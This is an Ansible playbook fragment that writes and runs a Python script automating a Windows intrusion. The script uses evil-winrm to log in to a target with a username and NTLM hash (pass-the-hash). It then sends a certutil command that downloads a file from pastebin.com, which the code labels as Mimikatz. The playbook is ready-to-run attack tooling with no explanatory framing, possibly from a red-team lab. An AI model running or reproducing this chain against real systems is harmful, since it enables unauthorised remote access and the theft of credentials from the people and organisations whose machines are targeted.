---
- name: Pastebin
  copy:
    dest: /opt/pastebin.py
    content: |
      import pexpect
      import re

      target_ip = "{{ target_ip }}"
      username = "{{ username }}"
      hash = "{{ ntlm }}"

      command = f"evil-winrm -i {target_ip} -u {username} -H {hash}"

      upload_mimikatz="certutil.exe -urlcache -f https://pastebin.com/ayrHaaNp sample.ps1"

      winrm=f'PS \x1b[0mC:\\Users\\{username}\\Documents> '
      child = pexpect.spawn(command)
      child.timeout = None
      child.expect(re.escape(winrm))
      child.sendline(upload_mimikatz)
      child.expect(re.escape(winrm))
      child.sendline("exit")
      res = child.before + child.after
      print(res)
       
      
       

- name: Make the script executable
  file:
    path: /opt/pastebin.py
    mode: '0755'


- name: Run the pastebin
  shell: python3 /opt/pastebin.py
  register: pastebin_output

- name: Display the output
  debug:
    msg: "{{ pastebin_output.stdout }}"
